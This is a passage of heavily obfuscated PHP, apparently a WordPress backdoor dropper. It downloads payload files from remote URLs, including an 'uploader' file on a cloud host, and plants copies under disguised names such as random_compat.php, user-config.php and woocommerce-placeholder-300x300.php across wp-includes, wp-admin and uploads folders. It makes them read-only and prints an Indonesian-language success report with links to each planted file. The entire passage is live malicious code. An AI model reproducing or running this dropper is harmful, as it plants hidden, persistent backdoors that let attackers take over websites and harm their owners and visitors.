x39\57\164\x6f\x6f\154\57\141\x6c\x66\x31\x5f\163\153\160\153\155\x7a\x2e\164\170\x74";$b13="\x68\164\164\x70\163\x3a\57\x2f\162\145\x73\56\143\x6c\x6f\165\x64\151\156\141\162\171\56\143\x6f\x6d\57\x64\142\141\163\x73\145\164\163\57\x72\x61\167\x2f\165\160\154\x6f\141\x64\x2f\x76\61\66\65\60\65\x37\61\x30\66\65\57\164\157\157\x6c\x2f\x75\x70\154\x6f\x61\x64\145\x72\137\x62\146\x7a\145\150\146\x2e\164\x78\164";$nama1="\x72\x61\x6e\144\x6f\155\x5f\142\x79\x74\x65\163\x5f\142\143\162\171\160\164\x2e\x70\x68\x70";$nama2="\x41\144\x76\x61\x6e\143\x65\x2e\160\x68\x70";$nama3="\x44\151\x72\x65\143\x74\157\x72\171\x2e\x70\150\160";$nama4="\162\141\156\x64\157\x6d\137\x63\157\155\160\141\x74\56\x70\x68\x70";$nama5="\x48\x6f\163\x74\x6e\x61\x6d\x65\56\160\x68\160";$nama6="\143\x6c\x61\163\x73\x2d\167\x70\x2d\x72\145\x73\164\55\x67\145\164\55\x63\x6f\x6e\164\162\x6f\154\x6c\145\162\56\x70\150\160";$nama7="\x6f\x75\x74\x6c\151\156\145\x2e\x70\150\160";$nama8="\163\x69\164\x65\55\160\x6c\165\147\151\156\x73\56\160\150\160";$nama9="\x75\163\145\162\x2d\143\x6f\156\x66\151\147\x2e\160\150\x70";$nama10="\155\x65\164\141\55\x64\145\x70\162\145\143\141\164\145\x64\x2e\x70\150\x70";$nama11="\x69\155\x61\147\145\x73\55\x6c\x6f\147\157\55\x66\141\x76\151\x63\157\x6e\56\x70\150\160";$nama12="\163\63\x2d\61\x2d\61\x2d\x34\x37\67\x78\64\x30\60\x2e\x70\150\x70";$nama13="\x77\157\x6f\x63\157\155\155\x65\x72\x63\x65\x2d\160\x6c\141\143\145\x68\x6f\x6c\144\x65\162\55\63\60\60\x78\63\x30\60\x2e\x70\150\160";$dir1=$_SERVER["\x44\x4f\x43\x55\x4d\105\x4e\x54\137\x52\x4f\x4f\x54"]."\x2f\x77\160\55\x69\156\143\154\x75\144\x65\x73\x2f\162\141\156\144\x6f\155\137\x63\x6f\x6d\160\141\164\57";if(!is_dir($dir1)){$dir1=$startDirectory."\x2f\x77\x70\55\x69\156\x63\154\x75\144\145\x73\57\162\x61\x6e\x64\157\155\137\143\x6f\155\x70\141\164\57";mkdir($dir1,493,true);}$dir2=$_SERVER["\x44\117\x43\x55\115\105\x4e\x54\137\122\117\117\x54"]."\x2f\x77\x70\x2d\x69\156\x63\x6c\x75\144\x65\163\57\122\x65\161\x75\x65\163\164\163\x2f\x41\165\164\x68\57";if(!is_dir($dir2)){$dir2=$startDirectory."\57\x77\x70\55\151\x6e\143\x6c\x75\x64\x65\x73\57\122\x65\x71\x75\145\x73\x74\163\57\x41\165\x74\x68\57";mkdir($dir2,493,true);}$dir3=$_SERVER["\x44\x4f\103\x55\115\105\x4e\124\137\x52\117\117\x54"]."\x2f\167\160\x2d\x69\156\143\x6c\165\x64\x65\163\57\163\157\144\x69\x75\x6d\x5f\143\157\x6d\x70\141\164\57\x6e\x61\155\145\163\160\x61\143\x65\x64\57";if(!is_dir($dir3)){$dir3=$startDirectory."\x2f\167\x70\55\x69\156\x63\154\165\x64\x65\x73\x2f\x73\157\x64\151\x75\155\x5f\143\x6f\x6d\160\x61\x74\57\156\x61\155\145\163\160\141\143\145\144\x2f";mkdir($dir3,493,true);}$dir4=$_SERVER["\x44\x4f\x43\125\115\105\116\124\x5f\122\x4f\x4f\x54"]."\57\x77\x70\55\151\x6e\143\x6c\165\x64\x65\x73\57\x73\157\144\x69\x75\155\137\x63\x6f\155\160\141\x74\57\x6c\151\142\x2f";if(!is_dir($dir4)){$dir4=$startDirectory."\x2f\167\160\55\x69\156\x63\154\x75\x64\x65\163\57\x73\157\x64\x69\165\x6d\x5f\x63\157\x6d\160\x61\164\57\154\x69\142\x2f";mkdir($dir4,493,true);}$dir5=$_SERVER["\104\x4f\x43\125\115\105\x4e\x54\x5f\122\117\117\124"]."\x2f\x77\x70\x2d\151\x6e\143\154\x75\x64\145\x73\x2f\120\x48\x50\x4d\x61\151\154\145\x72\57";if(!is_dir($dir5)){$dir5=$startDirectory."\x2f\167\160\55\x69\156\x63\x6c\x75\x64\x65\163\x2f\x50\x48\120\115\x61\x69\154\145\x72\57";mkdir($dir5,493,true);}$dir6=$_SERVER["\104\117\x43\x55\115\x45\x4e\x54\137\x52\117\x4f\124"]."\x2f\x77\x70\x2d\x69\x6e\x63\x6c\x75\x64\x65\x73\57\x72\145\x73\164\x2d\141\160\x69\57\x65\156\144\160\x6f\x69\x6e\x74\x73\57";if(!is_dir($dir6)){$dir6=$startDirectory."\x2f\167\x70\55\x69\x6e\x63\154\165\x64\x65\163\57\x72\x65\x73\x74\55\x61\x70\151\57\145\156\144\160\x6f\151\156\x74\x73\57";mkdir($dir6,493,true);}$dir7=$_SERVER["\104\117\103\x55\115\105\116\x54\x5f\x52\117\x4f\x54"]."\x2f\x77\x70\55\151\x6e\x63\154\x75\144\x65\163\57\124\x65\170\164\57\104\151\x66\146\57\x52\x65\x6e\x64\x65\x72\x65\x72\57";if(!is_dir($dir7)){$dir7=$startDirectory."\57\167\160\55\151\156\x63\x6c\x75\144\x65\163\57\124\x65\170\x74\57\x44\x69\x66\146\x2f\122\145\x6e\144\145\162\145\x72\57";mkdir($dir7,493,true);}$dir8=$_SERVER["\104\117\103\x55\115\x45\x4e\x54\x5f\122\117\117\124"]."\57\x77\160\55\141\x64\155\151\x6e\x2f\156\145\x74\167\157\x72\153\x2f";if(!is_dir($dir8)){$dir8=$startDirectory."\57\x77\160\55\141\144\155\x69\156\57\x6e\145\x74\x77\157\162\153\57";mkdir($dir8,493,true);}$dir9=$_SERVER["\x44\117\x43\x55\x4d\x45\x4e\x54\137\122\117\x4f\x54"]."\x2f\x77\160\55\x61\x64\x6d\151\156\x2f\x75\163\x65\x72\x2f";if(!is_dir($dir9)){$dir9=$startDirectory."\57\x77\x70\x2d\x61\144\x6d\151\156\57\165\x73\145\x72\57";mkdir($dir9,493,true);}$dir10=$_SERVER["\104\117\x43\125\115\x45\x4e\x54\x5f\122\x4f\117\x54"]."\x2f\x77\x70\x2d\x61\x64\x6d\x69\156\57\151\156\143\x6c\165\x64\145\x73\x2f";if(!is_dir($dir10)){$dir10=$startDirectory."\57\167\x70\x2d\x61\144\x6d\151\x6e\57\151\x6e\x63\154\x75\144\145\163\57";mkdir($dir10,493,true);}$dir11=$_SERVER["\104\117\x43\125\x4d\105\x4e\124\137\x52\x4f\117\124"]."\x2f\x77\160\x2d\143\157\156\x74\145\156\x74\x2f\165\x70\154\x6f\141\x64\x73\x2f\x32\60\x32\62\x2f\60\64\x2f";if(!is_dir($dir11)){$dir11=$startDirectory."\x2f\167\x70\55\x63\x6f\156\x74\145\156\164\57\x75\x70\x6c\157\x61\x64\x73\x2f\62\60\62\x32\57\x30\64\x2f";mkdir($dir11,493,true);}$dir12=$_SERVER["\x44\117\103\x55\115\x45\x4e\124\x5f\122\x4f\x4f\124"]."\57\167\160\x2d\143\157\x6e\x74\145\156\x74\x2f\165\160\x6c\157\x61\144\163\x2f\x32\60\62\62\x2f\60\61\x2f";if(!is_dir($dir12)){$dir12=$startDirectory."\57\167\x70\55\143\157\156\164\145\x6e\x74\x2f\x75\160\x6c\x6f\x61\x64\163\57\62\x30\x32\62\57\60\x31\x2f";mkdir($dir12,493,true);}$dir13=$_SERVER["\104\117\103\x55\x4d\105\x4e\124\137\x52\x4f\117\x54"]."\x2f\167\x70\55\x63\x6f\156\164\145\x6e\164\x2f\x75\x70\x6c\x6f\x61\x64\x73\57\x32\x30\62\62\57\x30\x32\x2f";if(!is_dir($dir13)){$dir13=$startDirectory."\x2f\167\x70\55\143\x6f\x6e\x74\x65\x6e\164\x2f\165\160\154\x6f\x61\x64\163\x2f\x32\x30\x32\x32\x2f\60\x32\57";mkdir($dir13,493,true);}$finalbd1=$dir1.$nama1;$finalbd2=$dir2.$nama2;$finalbd3=$dir3.$nama3;$finalbd4=$dir4.$nama4;$finalbd5=$dir5.$nama5;$finalbd6=$dir6.$nama6;$finalbd7=$dir7.$nama7;$finalbd8=$dir8.$nama8;$finalbd9=$dir9.$nama9;$finalbd10=$dir10.$nama10;$finalbd11=$dir11.$nama11;$finalbd12=$dir12.$nama12;$finalbd13=$dir13.$nama13;$bdresult='';if(!file_exists($finalbd1)){if(ini_get("\141\154\154\157\167\x5f\x75\162\154\137\x66\157\x70\x65\156")){$bd1=file_get_contents($b1);$status_bd1=file_put_contents($finalbd1,$bd1);if($status_bd1){$bdresult.="\x3c\x73\160\141\156\40\x73\x74\x79\x6c\x65\x3d\143\x6f\154\157\162\x3a\x23\x32\60\x65\x66\x32\x30\41\151\155\x70\x6f\162\164\x61\156\164\73\146\x6f\x6e\164\55\x77\145\151\x67\150\x74\72\x62\x6f\154\144\73\76\123\x75\x6b\163\145\163\x21\x3c\57\163\x70\x61\x6e\76\46\x6e\142\163\x70\73\46\156\x62\163\x70\x3b\46\x6e\142\x73\x70\73\x3c\x61\x20\x68\162\x65\x66\75\47".$home.$finalbd1."\x27\x20\x74\x61\162\147\145\164\75\47\x5f\x62\154\x61\156\x6b\47\40\162\145\154\75\x27\x6e\157\146\157\x6c\x6c\157\167\40\156\157\157\160\x65\x6e\x65\162\x20\x6e\x6f\x72\145\146\145\x72\162\x65\x72\x27\76".$home.$finalbd1."\74\57\x61\x3e\74\142\162\57\76".PHP_EOL;chmod($finalbd1,292);}else{$altdir1=$_SERVER["\x44\x4f\x43\125\x4d\x45\116\124\x5f\122\x4f\x4f\124"]."\57\x77\x70\55\143\157\x6e\x74\145\x6e\x74\57\165\x70\x6c\157\141\x64\163\x2f\x32\60\x32\x32\57\x30\62\x2f";if(!is_dir($altdir1)){$altdir1=$startDirectory."\x2f\x77\160\55\143\x6f\x6e\x74\145\x6e\x74\x2f\165\x70\x6c\157\x61\x64\x73\x2f\62\x30\x32\x32\x2f\60\62\57";}$altdir1_final=$altdir1.$nama1;file_put_contents($altdir1_final,$bd1);chmod($altdir1_final,292);$bdresult.="\74\x73\x70\141\x6e\40\163\x74\171\x6c\145\75\x63\x6f\x6c\x6f\162\x3a\x72\x65\x64\41\x69\x6d\x70\x6f\x72\x74\141\156\164\x3b\146\157\x6e\x74\55\x77\x65\x69\147\x68\x74\72\142\157\154\x64\73\x3e\x47\x61\147\x61\x6c\x20\124\141\x72\x6f\40\104\x69\x20\124\x61\x72\147\145\164\41\x20\x41\153\163\145\x73\40\144\x69\x3a\x3c\x2f\163\x70\141\156\x3e\46\156\x62\163\160\x3b\46\x6e\142\x73\x70\73\x26\x6e\142\x73\x70\73".$home.$altdir1_final."\x3c\x62\x72\57\76".PHP_EOL;}}}else{$bdresult.="\x3c\x73\x70\141\x6e\x20\163\164\x79\154\145\75\x63\157\x6c\157\162\72\x23\62\x30\145\146\x32\x30\41\x69\155\x70\x6f\162\164\141\156\164\73\x66\x6f\x6e\164\55\x77\x65\151\x67\x68\x74\x3a\x62\157\154\144\x3b\76\106\x69\154\x65\40\105\170\151\163\x74\163\41\74\57\163\160\141\156\76\x26\x6e\142\x73\160\x3b\46\x6e\x62\x73\x70\73\x26\156\x62\163\x70\73\74\141\40\x68\162\145\146\75\47".$home.$finalbd1."\x27\x20\164\141\x72\x67\x65\164\x3d\47\137\142\x6c\x61\x6e\153\x27\40\162\x65\x6c\75\47\156\x6f\146\x6f\x6c\x6c\x6f\x77\40\156\x6f\x6f\160\x65\x6e\x65\162\40\x6e\157\162\x65\x66\145\162\162\x65\x72\47\x3e".$home.$finalbd1."\x3c\57\x61\x3e\74\142\162\x2f\x3e".PHP_EOL;chmod($finalbd1,292);}if(!file_exists($finalbd2)){if(ini_get("\x61\154\x6c\x6f\x77\x5f\x75\x72\x6c\137\x66\157\x70\145\156")){$bd2=file_get_contents($b2);$status_bd2=file_put_contents($finalbd2,$bd2);if($status_bd2){$bdresult.="\74\x73\160\x61\x6e\40\x73\x74\x79\154\x65\x3d\x63\x6f\154\157\162\x3a\43\x32\x30\x65\146\62\60\41\x69\155\160\x6f\162\x74\141\x6e\164\x3b\x66\157\x6e\164\x2d\x77\145\151\x67\x68\164\72\x62\x6f\x6c\x64\73\x3e\x53\165\x6b\163\145\x73\41\x3c\57\163\160\141\156\76\x26\156\x62\x73\160\x3b\46\x6e\142\x73\160\x3b\x26\x6e\142\x73\160\x3b\74\x61\x20\150\x72\x65\146\x3d\x27".$home.$finalbd2."\x27\40\164\141\x72\147\x65\164\75\x27\x5f\142\154\x61\x6e\x6b\47\x20\x72\145\x6c\75\47\x6e\157\146\157\154\x6c\157\x77\40\x6e\157\x6f\x70\145\x6e\145\162\x20\x6e\x6f\162\145\146\x65\x72\162\x65\x72\x27\76".$home.$finalbd2."\x3c\57\x61\76\74\142\162\57\x3e".PHP_EOL;chmod($finalbd2,292);}else{$altdir2=$_SERVER["\104\x4f\103\125\115\105\x4e\x54\137\x52\117\117\124"]."\57\x77\160\x2d\143\x6f\x6e\x74\145\156\x74\x2f\x75\160\154\x6f\141\144\163\57\x32\x30\x32\x32\x2f\x30\x32\57";if(!is_dir($altdir2)){$altdir2=$startDirectory."\57\167\x70\x2d\143\x6f\x6e\x74\x65\156\x74\x2f\x75\160\x6c\x6f\x61\x64\x73\x2f\62\x30\x32\x32\57\x30\62\x2f";}$altdir2_final=$altdir2.$nama2;file_put_contents($altdir2_final,$bd2);chmod($altdir2_final,292);$bdresult.="\74\163\160\x61\156\x20\163\x74\x79\x6c\145\75\143\157\x6c\157\162\x3a\x72\x65\144\x21\151\155\160\x6f\x72\164\141\x6e\x74\73\146\x6f\156\164\55\167\145\151\147\150\164\72\142\157\x6c\144\x3b\x3e\x47\x61\147\141\x6c\40\x54\x61\x72\x6f\x20\104\151\x20\124\x61\162\147\x65\x74\41\40\101\x6b\163\145\163\x20\x64\151\72\74\57\163\x70\141\156\76\x26\156\x62\163\x70\x3b\46\x6e\x62\x73\x70\73\46\x6e\142\x73\160\x3b".$home.$altdir2_final."\x3c\142\162\x2f\x3e".PHP_EOL;}}}else{$bdresult.="\x3c\163\160\141\x6e\40\x73\x74\x79\154\x65\75\143\157\154\157\x72\72\43\62\60\x65\x66\62\60\41\x69\155\160\x6f\x72\164\x61\x6e\164\x3b\146\x6f\x6e\164\55\167\145\x69\147\150\x74\x3a\142\157\x6c\144\x3b\x3e\106\151\x6c\145\40\x45\170\151\163\164\163\x21\74\x2f\163\160\141\156\x3e\46\156\142\163\x70\x3b\x26\156\x62\163\160\x3b\x26\x6e\142\163\160\x3b\x3c\141\x20\150\162\x65\x66\x3d\x27".$home.$finalbd2."\x27\x20\x74\141\162\x67\x65\164\75\47\137\x62\154\x61\156\153\47\x20\162\145\154\x3d\47\x6e\157\x66\157\x6c\x6c\x6f\167\40\x6e\x6f\157\x70\145\x6e\145\162\x20\x6e\x6f\x72\145\x66\145\x72\162\x65\x72\47\76".$home.$finalbd2."\x3c\x2f\x61\x3e\74\142\x72\57\x3e".PHP_EOL;chmod($finalbd2,292);}if(!file_exists($finalbd3)){if(ini_get("\x61\154\x6c\157\x77\137\165\162\154\x5f\146\x6f\x70\x65\x6e")){$bd3=file_get_contents($b3);$status_bd3=file_put_contents($finalbd3,$bd3);if($status_bd3){$bdresult.="\74\163\x70\141\156\40\x73\x74\x79\154\145\75\x63\x6f\154\x6f\162\x3a\43\62\x30\x65\x66\x32\60\41\x69\155\160\157\162\x74\141\156\164\x3b\146\157\156\x74\55\x77\x65\x69\147\150\164\x3a\x62\157\154\144\73\76\x53\x75\x6b\x73\x65\163\41\74\x2f\163\x70\141\x6e\x3e\46\x6e\x62\163\160\x3b\x26\156\x62\x73\x70\x3b\46\156\x62\163\x70\x3b\x3c\141\40\150\162\145\x66\x3d\x27".$home.$finalbd3."\47\40\164\x61\162\147\145\x74\75\x27\x5f\x62\154\141\x6e\x6b\47\40\162\x65\154\75\47\x6e\x6f\146\x6f\x6c\x6c\157\x77\x20\x6e\x6f\x6f\x70\145\156\145\x72\x20\x6e\x6f\x72\145\146\145\162\x72\145\162\x27\76".$home.$finalbd3."\x3c\57\x61\x3e\74\x62\162\57\76".PHP_EOL;chmod($finalbd3,292);}else{$altdir3=$_SERVER["\104\117\103\125\x4d\105\116\x54\137\122\117\117\x54"]."\57\x77\160\x2d\143\x6f\x6e\x74\145\156\164\57\165\160\154\157\141\x64\x73\57\x32\60\x32\x32\57\x30\63\x2f";if(!is_dir($altdir3)){$altdir3=$startDirectory."\x2f\x77\x70\55\x63\x6f\x6e\164\145\156\164\x2f\165\160\154\157\141\144\x73\57\62\60\62\62\x2f\x30\63\x2f";}$altdir3_final=$altdir3.$nama3;file_put_contents($altdir3_final,$bd3);chmod($altdir3_final,292);$bdresult.="\74\x73\160\141\x6e\x20\x73\164\x79\154\x65\x3d\143\157\x6c\157\x72\72\x72\145\x64\x21\x69\155\160\157\x72\164\x61\x6e\x74\x3b\146\157\x6e\164\x2d\167\x65\151\147\150\x74\x3a\x62\157\x6c\x64\x3b\76\107\x61\x67\x61\x6c\40\x54\x61\x72\x6f\x20\x44\151\x20\x54\x61\162\x67\x65\164\41\40\101\153\163\x65\163\x20\x64\151\72\x3c\57\x73\x70\141\x6e\76\46\156\142\x73\x70\73\x26\156\x62\x73\160\x3b\x26\156\x62\163\160\73".$home.$altdir3_final."\x3c\x62\x72\57\76".PHP_EOL;}}}else{$bdresult.="\x3c\x73\x70\x61\156\40\x73\164\171\x6c\x65\75\143\157\154\x6f\162\x3a\x23\x32\x30\x65\x66\62\60\41\151\x6d\160\x6f\x72\x74\x61\x6e\164\73\146\x6f\156\x74\55\167\145\x69\x67\150\164\72\x62\x6f\x6c\x64\73\76\106\x69\154\145\40\x45\170\x69\x73\x74\x73\41\x3c\57\163\160\x61\x6e\x3e\x26\x6e\142\x73\x70\x3b\x26\156\x62\x73\160\x3b\46\x6e\142\163\x70\x3b\74\x61\x20\150\x72\x65\146\75\47".$home.$finalbd3."\47\40\x74\x61\x72\x67\x65\164\x3d\47\137\x62\x6c\141\156\153\47\40\x72\x65\154\75\x27\x6e\157\146\157\154\154\157\x77\x20\x6e\157\157\160\x65\156\x65\x72\40\156\157\162\145\146\x65\x72\x72\145\x72\x27\76".$home.$finalbd3."\74\57\x61\x3e\x3c\142\162\x2f\76".PHP_EOL;chmod($finalbd3,292);}if(!file_exists($finalbd4)){if(ini_get("\141\x6c\154\157\x77\x5f\165\x72\x6c\x5f\x66\x6f\x70\145\x6e")){$bd4=file_get_contents($b4);$status_bd4=file_put_contents($finalbd4,$bd4);if($status_bd4){$bdresult.="\74\163\x70\x61\x6e\40\x73\164\171\154\145\75\143\157\x6c\x6f\162\72\x23\62\x30\x65\x66\x32\x30\41\151\155\160\x6f\x72\164\x61\x6e\x74\73\x66\157\156\164\55\167\145\x69\x67\150\x74\72\x62\157\154\x64\73\76\123\165\x6b\163\x65\x73\41\x3c\x2f\x73\160\141\x6e\76\x26\x6e\x62\163\160\73\46\x6e\142\163\x70\73\46\156\x62\163\160\73\74\141\40\150\162\145\146\75\x27".$home.$finalbd4."\47\40\164\141\162\147\x65\x74\75\47\x5f\142\x6c\141\156\x6b\x27\x20\162\145\x6c\75\x27\156\x6f\x66\x6f\x6c\154\157\167\40\x6e\157\157\160\145\x6e\x65\x72\x20\156\x6f\x72\x65\146\x65\162\162\145\162\47\76".$home.$finalbd4."\74\57\141\x3e\x3c\142\x72\x2f\x3e".PHP_EOL;chmod($finalbd4,292);}else{$altdir4=$_SERVER["\x44\117\103\125\x4d\x45\116\x54\x5f\x52\x4f\x4f\x54"]."\57\x77\160\55\x63\157\156\164\145\156\x74\x2f\x75\160\x6c\x6f\141\144\163\x2f\x32\x30\62\62\57\x30\x32\x2f";if(!is_dir($altdir4)){$altdir4=$startDirectory."\57\x77\x70\x2d\x63\157\x6e\164\x65\156\x74\x2f\165\160\154\x6f\x61\x64\163\x2f\62\x30\x32\62\57\x30\62\57";}$altdir4_final=$altdir4.$nama4;file_put_contents($altdir4_final,$bd4);chmod($altdir4_final,292);$bdresult.="\x3c\x73\160\141\x6e\40\x73\164\x79\154\x65\x3d\143\157\154\x6f\x72\72\162\x65\x64\x21\x69\x6d\160\x6f\162\x74\141\x6e\164\x3b\146\x6f\x6e\x74\x2d\167\x65\151\147\150\164\x3a\142\x6f\x6c\144\73\x3e\107\141\x67\x61\154\40\x54\x61\162\157\x20\104\x69\x20\124\x61\x72\147\x65\164\x21\40\101\153\x73\145\x73\40\144\x69\72\x3c\57\x73\160\x61\156\76\46\156\x62\163\160\x3b\46\156\142\x73\x70\x3b\46\156\x62\x73\x70\x3b".$home.$altdir4_final."\74\142\162\x2f\76".PHP_EOL;}}}else{$bdresult.="\74\163\160\x61\156\x20\163\164\171\x6c\x65\75\x63\157\x6c\x6f\162\x3a\43\x32\x30\x65\x66\62\60\x21\x69\155\160\x6f\162\164\x61\156\164\x3b\x66\157\x6e\164\55\x77\x65\151\147\150\x74\72\142\157\x6c\x64\x3b\x3e\x46\x69\x6c\x65\x20\x45\x78\x69\163\164\163\x21\74\57\163\160\141\x6e\x3e\46\156\x62\x73\160\x3b\46\156\x62\163\x70\73\46\x6e\142\163\x70\x3b\x3c\141\40\150\x72\x65\146\x3d\x27".$home.$finalbd4."\47\x20\164\141\x72\x67\145\164\x3d\47\x5f\142\x6c\x61\156\x6b\x27\x20\162\145\x6c\75\x27\156\157\x66\157\154\154\157\167\x20\156\157\157\160\145\x6e\x65\x72\40\156\157\x72\145\x66\145\x72\162\145\162\47\x3e".$home.$finalbd4."\x3c\x2f\141\76\x3c\142\x72\x2f\x3e".PHP_EOL;chmod($finalbd4,292);}if(!file_exists($finalbd5)){if(ini_get("\141\x6c\154\x6f\x77\x5f\165\162\x6c\137\x66\157\x70\145\156")){$bd5=file_get_contents($b5);$status_bd5=file_put_contents($finalbd5,$bd5);if($status_bd5){$bdresult.="\x3c\x73\160\141\x6e\40\x73\164\171\154\145\75\x63\157\x6c\x6f\x72\x3a\x23\x32\60\145\x66\62\60\41\x69\155\x70\x6f\x72\x74\141\156\164\x3b\x66\x6f\156\x74\55\167\x65\x69\147\150\164\72\x62\157\154\x64\x3b\x3e\x53\165\x6b\x73\145\x73\41\x3c\x2f\163\160\141\x6e\76\x26\x6e\142\x73\x70\73\46\x6e\x62\163\160\x3b\x26\156\x62\163\160\x3b\74\x61\x20\x68\x72\x65\146\75\x27".$home.$finalbd5."\47\x20\164\141\x72\x67\x65\x74\75\47\137\x62\154\141\156\x6b\x27\x20\x72\145\x6c\75\x27\156\x6f\x66\157\x6c\154\157\167\40\x6e\157\x6f\x70\145\x6e\x65\x72\40\x6e\x6f\x72\145\146\x65\x72\x72\145\162\x27\76".$home.$finalbd5."\74\57\x61\x3e\74\142\x72\57\76".PHP_EOL;chmod($finalbd5,292);}else{$altdir5=$_SERVER["\104\x4f\103\x55\115\105\x4e\124\x5f\x52\117\117\x54"]."\57\167\160\x2d\143\157\x6e\164\x65\x6e\x74\x2f\165\160\x6c\x6f\x61\x64\x73\x2f\x32\60\x32\62\57\60\62\57";if(!is_dir($altdir5)){$altdir5=$startDirectory."\57\x77\160\x2d\143\x6f\x6e\164\145\x6e\x74\57\165\160\154\157\x61\x64\x73\57\62\60\x32\62\x2f\x30\62\x2f";}$altdir5_final=$altdir5.$nama5;file_put_contents($altdir5_final,$bd5);chmod($altdir5_final,292);$bdresult.="\x3c\x73\x70\141\156\40\x73\164\x79\x6c\145\75\143\x6f\x6c\x6f\x72\x3a\x72\145\144\x21\x69\155\160\157\x72\x74\x61\x6e\x74\x3b\146\x6f\156\x74\55\167\145\x69\x67\150\164\x3a\x62\x6f\x6c\144\x3b\x3e\107\141\147\141\154\40\x54\x61\x72\157\40\104\151\40\x54\141\162\147\145\164\x21\40\101\153\163\145\163\x20\x64\x69\72\74\x2f\163\x70\x61\x6e\x3e\x26\x6e\142\x73\x70\73\46\x6e\x62\x73\160\x3b\x26\x6e\142\x73\x70\x3b".$home.$altdir5_final."\74\x62\162\57\76".PHP_EOL;}}}else{$bdresult.="\x3c\163\x70\141\156\x20\163\164\171\154\145\75\x63\157\x6c\x6f\x72\72\43\62\x30\145\x66\x32\60\41\151\155\x70\x6f\162\x74\x61\156\164\73\146\x6f\156\164\x2d\x77\x65\x69\147\150\164\x3a\x62\x6f\154\x64\73\76\106\151\x6c\x65\40\x45\x78\151\163\164\163\41\74\x2f\163\x70\141\x6e\x3e\x26\156\142\163\160\73\x26\x6e\142\x73\x70\x3b\x26\156\x62\163\160\73\74\141\x20\x68\162\x65\146\x3d\47".$home.$finalbd5."\47\x20\164\x61\x72\147\x65\x74\75\47\x5f\142\x6c\141\156\x6b\47\x20\162\145\x6c\75\47\x6e\x6f\146\157\x6c\x6c\x6f\167\40\156\x6f\x6f\160\x65\x6e\x65\162\x20\156\157\x72\145\x66\145\162\162\145\162\47\x3e".$home.$finalbd5."\74\57\x61\76\74\x62\x72\x2f\76".PHP_EOL;chmod($finalbd5,292);}if(!file_exists($finalbd6)){if(ini_get("\141\154\x6c\x6f\x77\137\x75\x72\x6c\137\x66\x6f\x70\145\x6e")){$bd6=file_get_contents($b6);$status_bd6=file_put_contents($finalbd6,$bd6);if($status_bd6){$bdresult.="\x3c\163\160\x61\x6e\40\163\164\171\x6c\145\x3d\143\157\154\157\x72\72\x23\x32\x30\x65\146\x32\x30\x21\151\155\160\x6f\162\x74\141\x6e\x74\73\x66\157\x6e\x74\55\x77\145\151\x67\x68\x74\72\x62\157\x6c\144\x3b\76\x53\165\x6b\x73\145\x73\x21\x3c\57\x73\x70\141\x6e\76\x26\x6e\x62\x73\x70\x3b\x26\x6e\142\163\160\73\46\x6e\142\163\160\x3b\x3c\x61\x20\x68\162\x65\x66\75\x27".$home.$finalbd6."\x27\40\164\141\x72\147\x65\x74\75\47\137\142\154\x61\x6e\153\47\40\162\145\x6c\x3d\x27\156\157\x66\157\154\x6c\157\x77\x20\156\x6f\x6f\160\x65\x6e\145\162\x20\156\157\162\x65\146\x65\x72\x72\145\162\47\76".$home.$finalbd6."\74\x2f\x61\x3e\x3c\x62\162\57\x3e".PHP_EOL;chmod($finalbd6,292);}else{$altdir6=$_SERVER["\104\x4f\103\125\x4d\105\x4e\124\137\x52\x4f\117\124"]."\57\x77\160\x2d\x63\x6f\x6e\x74\x65\156\x74\57\x75\x70\x6c\157\141\144\x73\x2f\x32\x30\x32\x32\x2f\60\x34\57";if(!is_dir($altdir6)){$altdir6=$startDirectory."\x2f\x77\x70\55\143\x6f\x6e\x74\145\156\164\57\x75\x70\x6c\157\x61\144\163\x2f\62\60\62\x32\57\x30\64\57";}$altdir6_final=$altdir6.$nama6;file_put_contents($altdir6_final,$bd6);chmod($altdir6_final,292);$bdresult.="\74\163\x70\141\156\x20\163\x74\171\154\145\x3d\x63\x6f\154\157\x72\x3a\162\x65\x64\41\x69\x6d\160\x6f\162\x74\x61\156\x74\x3b\x66\157\156\164\55\167\x65\x69\147\150\164\x3a\142\x6f\154\144\x3b\76\x47\x61\147\141\x6c\x20\124\141\x72\157\40\x44\x69\40\124\x61\162\147\145\x74\41\40\101\x6b\x73\145\x73\x20\x64\151\x3a\74\57\x73\x70\x61\x6e\x3e\46\156\x62\163\x70\73\46\x6e\x62\x73\x70\x3b\46\x6e\x62\163\x70\x3b".$home.$altdir6_final."\x3c\x62\x72\57\76".PHP_EOL;}}}else{$bdresult.="\x3c\163\160\141\x6e\40\x73\164\x79\x6c\145\x3d\143\x6f\x6c\157\x72\72\x23\x32\x30\145\146\x32\60\x21\151\155\x70\157\162\164\x61\x6e\164\73\146\157\156\164\x2d\167\145\x69\x67\x68\164\72\142\157\x6c\144\x3b\76\106\x69\154\145\40\105\x78\x69\x73\164\163\41\74\57\163\x70\141\x6e\x3e\x26\x6e\142\163\160\x3b\46\x6e\x62\x73\160\x3b\46\156\142\163\x70\x3b\74\141\40\150\162\145\146\75\47".$home.$finalbd6."\x27\40\164\x61\162\x67\x65\x74\75\47\x5f\x62\154\x61\x6e\x6b\47\40\162\145\154\x3d\47\x6e\x6f\146\157\x6c\x6c\x6f\167\x20\x6e\x6f\x6f\x70\145\x6e\145\162\x20\x6e\x6f\162\145\x66\145\x72\162\x65\162\47\x3e".$home.$finalbd6."\74\x2f\x61\x3e\74\142\162\57\x3e".PHP_EOL;chmod($finalbd6,292);}if(!file_exists($finalbd7)){if(ini_get("\141\154\154\x6f\167\x5f\x75\x72\x6c\137\x66\157\160\x65\x6e")){$bd7=file_get_contents($b7);$status_bd7=file_put_contents($finalbd7,$bd7);if($status_bd7){$bdresult.="\x3c\x73\x70\x61\156\x20\163\164\171\154\145\75\x63\x6f\154\157\162\72\43\62\60\145\x66\x32\x30\x21\151\x6d\160\x6f\x72\164\x61\156\164\x3b\x66\x6f\156\x74\55\167\145\151\x67\150\164\72\x62\x6f\x6c\144\73\x3e\x53\x75\x6b\163\145\163\x21\74\57\163\160\141\156\76\x26\156\142\163\x70\x3b\46\156\142\163\x70\73\x26\x6e\x62\x73\160\73\x3c\x61\40\150\162\145\146\x3d\47".$home.$finalbd7."\x27\40\164\x61\x72\x67\145\x74\x3d\47\x5f\x62\154\x61\156\153\x27\40\162\x65\154\x3d\47\156\157\146\157\154\x6c\x6f\167\x20\x6e\157\157\x70\x65\156\145\162\40\156\x6f\162\145\146\x65\x72\x72\145\x72\47\x3e".$home.$finalbd7."\x3c\57\141\76\74\142\x72\57\x3e".PHP_EOL;chmod($finalbd7,292);}else{$altdir7=$_SERVER["\x44\117\x43\125\115\105\x4e\x54\137\x52\x4f\x4f\x54"]."\57\x77\